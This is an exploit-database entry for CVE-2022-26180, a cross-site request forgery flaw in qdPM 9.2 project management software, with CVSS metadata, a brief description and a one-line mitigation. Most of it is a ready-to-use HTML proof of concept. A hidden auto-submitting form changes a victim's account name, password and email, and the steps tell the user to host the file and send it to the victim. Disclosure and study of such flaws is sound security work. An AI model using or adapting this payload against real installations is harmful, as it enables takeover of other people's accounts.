header-logo
Suggest Exploit
vendor:
qdPM
by:
Chetanya Sharma @AggressiveUser
8.8
CVSS
HIGH
Cross-site Request Forgery (CSRF)
352
CWE
Product Name: qdPM
Affected Version From: 9.2
Affected Version To: 9.2
Patch Exists: NO
Related CWE: CVE-2022-26180
CPE: a:qdpm:qdpm:9.2
Metasploit:
Other Scripts:
Platforms Tested: KALI OS
2022

qdPM 9.2 – Cross-site Request Forgery (CSRF)

qdPM 9.2 is vulnerable to Cross-site Request Forgery (CSRF). An attacker can craft a malicious HTML file and host it. The attacker can then send the malicious HTML file to the victim. When the victim opens the malicious HTML file, the attacker can modify the user account details of the victim.

Mitigation:

Implementing CSRF protection mechanisms such as synchronizer tokens, same-site cookies, and anti-CSRF tokens.
Source

Exploit-DB raw data:

# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)
# Google Dork: NA
# Date: 03/27/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: KALI OS
# CVE : CVE-2022-26180
#
---------------

Steps to Exploit : 
	1) Make an HTML file of given POC (Change UserID field Accordingly)and host it.
	2) send it to victim.

<html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST">
      <input type="hidden" name="sf&#95;method" value="put" />
      <input type="hidden" name="users&#91;id&#93;" value="1" /> <!-- Change User ID Accordingly --->
      <input type="hidden" name="users&#91;photo&#95;preview&#93;" value="" />
      <input type="hidden" name="users&#91;name&#93;" value="AggressiveUser" />
      <input type="hidden" name="users&#91;new&#95;password&#93;" value="TEST1122" />
      <input type="hidden" name="users&#91;email&#93;" value="administrator&#64;Lulz&#46;com" />
      <input type="hidden" name="users&#91;photo&#93;" value="" />
      <input type="hidden" name="users&#91;culture&#93;" value="en" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR